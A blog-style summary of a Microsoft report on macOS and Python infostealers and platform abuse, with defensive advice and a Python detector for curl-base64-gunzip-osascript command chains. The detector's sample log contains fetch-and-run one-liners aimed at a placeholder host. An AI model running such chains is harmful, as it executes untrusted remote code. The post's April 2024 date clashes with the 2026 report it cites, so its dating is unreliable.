Infostealers without borders: macOS, Python stealers, and platform abuse (A report by Microsoft)

Khushal

Apr 4, 2024
Infostealer threats are rapidly expanding beyond traditional Windows-focused campaigns, increasingly targeting macOS environments, leveraging cross-platform languages such as Python, and abusing trusted platforms and utilities to silently deliver credential-stealing malware at scale. Since late 2025, Microsoft Defender Experts has observed macOS-targeted infostealer campaigns using social engineering techniques—including ClickFix-style prompts and malicious DMG installers—to deploy macOS-specific infostealers such as DigitStealer, MacSync, and Atomic macOS Stealer (AMOS).

These campaigns leverage fileless execution, native macOS utilities, and AppleScript automation to harvest credentials, session data, and secrets from browsers, keychains, and developer environments. Simultaneously, Python-based stealers are being leveraged by attackers to rapidly adapt, reuse code, and target heterogeneous environments with minimal overhead. Other threat actors are abusing trusted platforms and utilities—including WhatsApp and PDF converter tools—to distribute malware like Eternidade Stealer and gain access to financial and cryptocurrency accounts.
This Microsoft write-up (published February 2, 2026) is essentially a reminder that “infostealers” are no longer a Windows-only problem: attackers are actively targeting macOS users, using cross-platform malware (notably Python), and abusing trusted delivery channels to blend in. ([microsoft.com](https://www.microsoft.com/en-us/security/blog/2026/02/02/infostealers-without-borders-macos-python-stealers-and-platform-abuse/))

What’s notable in the report
  • macOS delivery is often “user-assisted” via malvertising/SEO poisoning and fake sites that either push a malicious DMG or use “ClickFix”-style tricks to get the victim to copy/paste commands into Terminal. ([microsoft.com](https://www.microsoft.com/en-us/security/blog/2026/02/02/infostealers-without-borders-macos-python-stealers-and-platform-abuse/))
  • Microsoft highlights macOS stealer campaigns they observed since late 2025, including DigitStealer, MacSync, and Atomic macOS Stealer (AMOS), aimed at stealing browser credentials/session data, wallet data, and developer/cloud secrets. ([microsoft.com](https://www.microsoft.com/en-us/security/blog/2026/02/02/infostealers-without-borders-macos-python-stealers-and-platform-abuse/))
  • Python stealers are being distributed via phishing and can be adapted quickly; Microsoft specifically discusses PXA Stealer activity observed in 2025, including persistence and exfiltration patterns. ([microsoft.com](https://www.microsoft.com/en-us/security/blog/2026/02/02/infostealers-without-borders-macos-python-stealers-and-platform-abuse/))
  • “Platform abuse” is a major theme: the post describes campaigns leveraging WhatsApp (including automated propagation) and a trojanized “Crystal PDF” installer to spread stealers and harvest browser data. ([microsoft.com](https://www.microsoft.com/en-us/security/blog/2026/02/02/infostealers-without-borders-macos-python-stealers-and-platform-abuse/))

Practical defensive takeaways (home + SMB + enterprise)
  • Treat “copy/paste this in Terminal to fix/verify” as a red flag. That specific interaction pattern is repeatedly abused in these macOS campaigns. ([microsoft.com](https://www.microsoft.com/en-us/security/blog/2026/02/02/infostealers-without-borders-macos-python-stealers-and-platform-abuse/))
  • Avoid unsigned/untrusted DMGs and “fix tools”; stick to official vendor sources and reputable app stores where possible. ([microsoft.com](https://www.microsoft.com/en-us/security/blog/2026/02/02/infostealers-without-borders-macos-python-stealers-and-platform-abuse/))
  • Monitor/alert on suspicious macOS command chains (Defender specifically calls out flows involving curl, base64 decoding, gunzip, osascript, and JXA), and watch for fileless/in-memory pipelines. ([microsoft.com](https://www.microsoft.com/en-us/security/blog/2026/02/02/infostealers-without-borders-macos-python-stealers-and-platform-abuse/))
  • Watch egress + staging behaviors (e.g., unusual POSTs to suspicious/newly-registered domains; transient ZIP creation under /tmp followed by exfil). ([microsoft.com](https://www.microsoft.com/en-us/security/blog/2026/02/02/infostealers-without-borders-macos-python-stealers-and-platform-abuse/))
  • In Windows-managed environments, Microsoft reiterates hardening items like cloud-delivered protection, EDR in block mode, SmartScreen, tamper protection, and ASR rules (block obfuscated scripts, block low-prevalence executables, block JS/VBS launching downloaded executables). ([microsoft.com](https://www.microsoft.com/en-us/security/blog/2026/02/02/infostealers-without-borders-macos-python-stealers-and-platform-abuse/))
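To make the "suspicious macOS command chains" item concrete, here is an added example (my own illustration, not code from Microsoft or the report) of a small detector that scores each process-execution log line by how many of the fetch / decode / decompress / execute stages it chains together. The stage regexes, the threshold, and the sample log lines are all constructed assumptions; placeholder.invalid is a placeholder host.

```python
import re
from dataclasses import dataclass

# Stages of the fileless delivery flow the report calls out (curl -> base64
# decode -> gunzip -> osascript/JXA). Patterns are an assumption for this example.
STAGE_PATTERNS = {
    "fetch":      re.compile(r"\bcurl\b"),
    "decode":     re.compile(r"\bbase64\b\s+(?:-d|--decode|-D)\b"),  # macOS base64 uses -D
    "decompress": re.compile(r"\b(?:gunzip|gzip\s+-d)\b"),
    "execute":    re.compile(r"\bosascript\b"),
}

@dataclass
class Finding:
    line_no: int
    stages: tuple
    score: int

def score_command(cmd: str) -> tuple:
    """Return the stage names present in one shell command line, in pipeline order."""
    return tuple(name for name, pat in STAGE_PATTERNS.items() if pat.search(cmd))

def scan(log_lines, threshold: int = 3):
    """Flag lines that chain at least `threshold` stages; single tools alone stay quiet."""
    findings = []
    for n, line in enumerate(log_lines, 1):
        stages = score_command(line)
        if len(stages) >= threshold:
            findings.append(Finding(n, stages, len(stages)))
    return findings

# Constructed sample log: lines 1, 2 and 5 are ordinary admin activity, 3 and 4
# resemble the ClickFix-style chains described above.
SAMPLE_LOG = [
    "curl -O https://example.com/release.tar.gz",
    "osascript -e 'display dialog \"Backup finished\"'",
    "curl -fsSL http://placeholder.invalid/p | base64 -D | gunzip | osascript",
    "curl -s http://placeholder.invalid/j | base64 -d | osascript -l JavaScript",
    "gunzip logs.gz",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.score} stages chained {f.stages}")
```

The threshold keeps a lone curl or osascript invocation from alerting; tuning it to 2 trades more noise for catching shorter chains.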

If someone suspects they ran a stealer
Because stealers commonly take passwords and session cookies/tokens, the usual safe play is: isolate the device, then from a known-clean device rotate passwords and revoke active sessions/tokens for email/banking/social/cloud/dev platforms; also rotate developer keys (SSH keys, cloud access keys) and crypto wallet secrets if applicable. Microsoft explicitly frames these campaigns as leading to account takeover and downstream business-impact scenarios. ([microsoft.com](https://www.microsoft.com/en-us/security/blog/2026/02/02/infostealers-without-borders-macos-python-stealers-and-platform-abuse/))
